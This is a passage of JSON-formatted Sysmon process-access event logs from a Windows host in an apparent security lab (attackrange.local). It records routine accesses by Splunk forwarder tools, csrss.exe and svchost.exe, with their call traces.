{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nSourceProcessId: 2764\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nTargetProcessId: 2800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","SourceProcessId":"2764","SourceThreadId":"2796","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","TargetProcessId":"2800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nTargetProcessId: 2800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","TargetProcessId":"2800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 